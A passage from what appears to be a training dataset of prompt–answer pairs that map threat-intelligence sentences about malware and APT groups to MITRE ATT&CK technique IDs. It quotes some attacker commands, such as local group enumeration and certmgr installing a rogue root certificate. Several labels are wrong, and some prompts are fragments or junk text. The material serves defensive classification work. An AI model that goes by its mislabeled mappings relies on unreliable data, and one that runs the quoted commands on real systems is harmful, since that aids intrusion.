persistence.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor can download additional plugins, updates and other files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Darkhotel has also stolen certificates and signed backdoors and downloaders with them.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This functionality is used by Windows features such as User Account Control to correctly set the PPID after a requested elevated process is spawned by SYSTEM rather than the current user context.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,launchctl### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system.### Assistant: T1129: Shared Modules" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWRUNER may collect local group information by running net localgroup administrators or a series of other commands on a victim.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has used GitHub repositories for downloaders which will be obtained by the group's .NET executable on the compromised system.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT41 sent spearphishing emails with attachments such as compiled HTML files to initially compromise their victims.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Orz can gather the victim OS version and whether it is 64 or 32 bit.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chaes has used cmd to execute tasks on the system.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZIRCONIUM has used the AES256 algorithm with a SHA1 derived key to decrypt exploit code.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor monitors the free disk space on the system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PLEAD has the ability to list processes on the compromised host.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Derusbi is capable of performing audio captures.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Scripts can be run from the command-line via osascript /path/to/script or osascript -e ""script here"".### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar has been spread via emails with embedded malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon uses HTTP to send data to the C2 server.### Assistant: T1048: Exfiltration Over Alternative Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kazuar adds a sub-key under several Registry run keys.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty uses the net view command for discovery.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Office add-ins can be used to add functionality to Office programs.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications as well as other Windows objects that contain insecure methods.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use scripts or manually run the commands launchctl load -w ""%s/Library/LaunchAgents/%s"" or /bin/launchctl load to execute Launch Agents or Launch Daemons.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent.btz collects the network adapter’s IP and MAC address as well as IP addresses of the network adapter’s default gateway, primary/secondary WINS, DHCP, and DNS servers, and saves them into a log file.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT1 has sent spearphishing emails containing hyperlinks to malicious files.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has compromised domains to use for C2.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Spark has exfiltrated data over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GravityRAT uses the netstat command to find open ports on the victim’s machine.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,While adversaries typically require root privileges to create/modify service unit files in the /etc/systemd/system and /usr/lib/systemd/system directories, low privilege users can create/modify service unit files in directories such as ~/.config/systemd/user/ to achieve user-level persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Common file types, such as text files and image files are typically used as the first extension to appear benign.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In later versions of Windows , PubPrn.vbs has been updated to prevent proxying execution from a remote site.### Assistant: T1216: Signed Script Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,email client, Outlook, and Windows Credential Store.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Rocke's miner, ""TermsHost.exe"", evaded defenses by injecting itself into Windows processes, including Notepad.exe.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unlike Credential API Hooking, this focuses solely on API functions intended for processing keystroke data.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NanHaiShu launches a script to delete their original decoy file to cover tracks.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser has used HTTP and HTTPS for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BADFLICK has captured victim computer name, memory space, and CPU details.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHARPSTATS has the ability to identify the current date and time on the compromised host.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.### Assistant: T1601: Modify System Image" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CORALDECK has created password-protected RAR, WinImage, and zip archives to be exfiltrated.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy creates a Registry subkey that registers a new system device.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor has a plugin that collects data stored in the Windows clipboard by using the OpenClipboard and GetClipboardData APIs.### Assistant: T1115: Clipboard Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth exfiltrates collected information from its r1.log file to the external C2 server.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to identify hardware information, the computer name, and OS information on an infected host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can discover processes on compromised hosts.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,itwm= ags= oe= aq= btnG= oprnd= itwm= utm= channel= The XAgent OSX Trojan generates a system specific value that it refers to as an “agent_id”, which is a unique identifier for each compromised host### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been observed encrypting the data it collects before sending it to the C2 server.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The BlackEnergy component KillDisk is capable of deleting Windows Event Logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater has performed credential dumping with LaZagne and other tools, including by dumping passwords saved in victim email.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.### Assistant: T1484: Domain Policy Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SodaMaster can enumerate the host name and OS version on a target system.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CARROTBAT has the ability to execute command line arguments on a compromised host.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used spearphishing to compromise credentials.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They are loaded and unloaded through kextload and kextunload commands.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,regasm.exe ### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak malware installs itself as a service to provide persistence and SYSTEM privileges.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP has the capability to delete local files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM has a function called ""DeleteLeftovers"" to remove certain artifacts of the attack.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DustySky collects information about running processes from victims.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks.### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT has established tmate sessions for C2 communications.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windows password filters are password policy enforcement mechanisms for both domain and local accounts.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can enumerate files and collect associated metadata.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lazarus Group malware SierraAlfa sends data to one of the hard-coded C2 servers chosen at random, and if the transmission fails, chooses a new C2 server to attempt the transmission again.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Zebrocy has used URL/Percent Encoding on data exfiltrated via HTTP POST requests.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Metamorfo has communicated with hosts over raw TCP on port 9999.### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The crontab file contains the schedule of cron entries to be run and the specified times for execution.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole has been configured with several servers available for alternate C2 communications.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Chimera has collected credentials for the target organization from previous breaches for use in brute force attacks.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A Silver Ticket can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource .### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT16 has compromised otherwise legitimate sites as staging servers for second-stage payloads.### Assistant: T1584: Compromise Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Further collaboration between FireEye as a Service (FaaS), Mandiant and FireEye iSIGHT intelligence uncovered additional victims worldwide, a new suite of tools and novel techniques### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has edited variable names within the Impacket suite to avoid automated detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 used NTFS alternate data streams to hide their payloads.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SYNful Knock can be sent instructions via special packets to change its functionality.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Psylo uses HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoetRAT has the ability to gather information about the compromised host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attackers using Comnie are leveraging malicious macros that initially hide decoy documents and shows them when the victim enables macros### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Hikit uses certmgr.exe -add GlobalSign.cer -c -s -r localMachine Root and certmgr.exe -add GlobalSign.cer -c -s -r localMachineTrustedPublisher to install a self-generated certificate to the local trust store as a root CA and Trusted Publisher.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Proc memory injection involves enumerating the memory of a process via the /proc filesystem then crafting a return-oriented programming payload with available gadgets/instructions.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Explosive has commonly set file and path attributes to hidden.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex contains a backconnect module for tunneling network traffic through a victim's computer.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InnaputRAT enumerates directories and obtains file attributes on a system.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Reaver encrypts collected data with an incremental XOR key prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can establish persistence by writing shortcuts to the Windows Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information from these sources may reveal opportunities for other forms of reconnaissance or Phishing for Information, establishing operational resources or Obtain Capabilities, and/or initial access or Trusted Relationship.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has collected a list of open connections on the infected system using netstat and checks whether it has an internet connection.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.### Assistant: T1014: Rootkit" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CostaBricks can implement a custom-built virtual machine mechanism to obfuscate its code.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT can load a PE file from memory or the file system and execute it with CreateProcessW.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These are in-line with the targeting of the victims witnessed by the attackers using Conmie### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tonto Team has used keylogging tools in their operations.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The recovered encrypted data may be vulnerable to offline Password Cracking attacks similarly to Kerberoasting and expose plaintext credentials.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ProLock can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BadPatch has a keylogging capability.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Get2 has the ability to identify the computer name and Windows version of an infected host.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Drovorub can use kernel modules to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EvilBunny has deleted the initial dropper after running through the environment checks.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ECCENTRICBANDWAGON can capture and store keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,They extend the functionality of the kernel without the need to reboot the system.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to stop services on the infected host.### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.### Assistant: T1199: Trusted Relationship" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A typical example of this is environments where internal networks make use of non-Internet routable addresses.### Assistant: T1599: Network Boundary Bridging" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RTM encrypts C2 traffic with a custom RC4 variant.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Turla surveys a system upon check-in to discover the system time by using the net time command.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbon uses the netstat -r and netstat -an commands.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can steal data and credentials from browsers.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBferry can copy its installer to attached USB storage devices.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 2: Zyklon attack flow Infection Techniques CVE-2017-8759 This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 successfully gained remote access by using pass the ticket.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has modules that are capable of capturing video from a victim's webcam.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can use winapiexec tool for indirect execution of ShellExecuteW and CreateProcessA.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,KEYMARBLE has a command to create Registry entries for storing data under HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell supports functionality for VNC sessions.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SHARPSTATS has the ability to upload and download files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wiarp creates a backdoor through which remote attackers can download files.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kasidet can execute commands using cmd.exe.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,At face value, this current variant of OopsIE has a vast majority of its strings obfuscated, which can be deobfuscated by splitting the strings using the hyphen as a delimiter, treating each split value as an integer, subtracting one from each integer and converting each into a character### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Screenshots The data dump includes several screenshots of resources that the leaker alleged was related to the OilRig group### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that exfiltrates data over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FInally , the newest sample uses dynamic API lookups to attempt to make static disassembly harder to understand.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot downloads several additional files and saves them to the victim's machine.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has used a variety of publicly available tools like LaZagne, Mimikatz, and ProcDump to dump credentials.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Files have been encrypted with their own AES key and given a file extension of .RYK.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The POSHSPY backdoor is designed to download and execute additional PowerShell code and Windows binaries### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSTATS can use JavaScript code for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT33 has utilized PowerShell to download files from the C2 server and run various scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT used blogpost.com as its primary command and control server during a campaign.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An RTF, an MSI file, a .NET Wrapper and two stages of Shellcode walk into a bar… Our journey begins with an RTF file named “New Salary Structure 2017.doc”, which exploits CVE-2017-0199### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StreamEx uses rundll32 to call an exported function.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sidewinder has sent e-mails with malicious attachments that lead victims to credential harvesting websites.### Assistant: T1598: Phishing for Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa used ipconfig to gather network configuration information.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has written malware variants in Visual Basic.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has delivered JHUHUGIT and Koadic by executing PowerShell commands through DDE in Word documents.### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute System.ComponentModel.RunInstaller.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FatDuke has the ability to create a process.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Get-NetForestTrust ### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet used copies of .lnk shortcuts to propagate through removable media.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook can download files to the system.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One variant of BlackEnergy creates a new service using either a hard-coded or randomly generated name.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN6 used another set of compromised credentials with membership to additional groups in the domain to RDP to other hosts### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,As of OSX 10.10, OSA only supports two languages, JXA and AppleScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Attor's dispatcher disguises itself as a legitimate task , the task name and description appear legitimate.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can use various APIs to allocate memory and facilitate code execution/injection.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center , potentially making detection more difficult.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can use HTTP and HTTPS over ports 80 and 443 in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by Password Cracking Kerberos messages.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Trojan.Karagany can perform reconnaissance commands on a victim machine via a cmd.exe process.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Command Description !Dir Lists the contents of a specified directory !Drives Enumerates the storage drives attached to the system and their respective type### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kerrdown has been distributed via e-mails containing a malicious link.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Otherwise, it runs a search for the “/bin/rsyncd” string within the files found in the /etc/ folder### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT34 has used valid administrator credentials to assist in lateral movement.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may create a snapshot or data backup within a cloud account to evade defenses.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,* Staging web resources for a link target to be used with spearphishing.### Assistant: T1608: Stage Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SpeakUp uses the ifconfig -a command.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability, however in late January 2018 when, paradoxically, newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PoisonIvy stages collected data in a text file.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ShadowPad has sent data back to C2 every 8 hours.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim to executing a malicious attachment### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Misdat saves itself as a file named msdtc.exe, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,20 New processes The malicious svchost constantly queries ieframe.dll, as well as IWebBrowser2 Interface using CLSID dc30c1661-cdaf-11D0-8A3E-00c04fc9e26e, both key components to interact with Internet Explorer### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LoJax has modified the Registry key 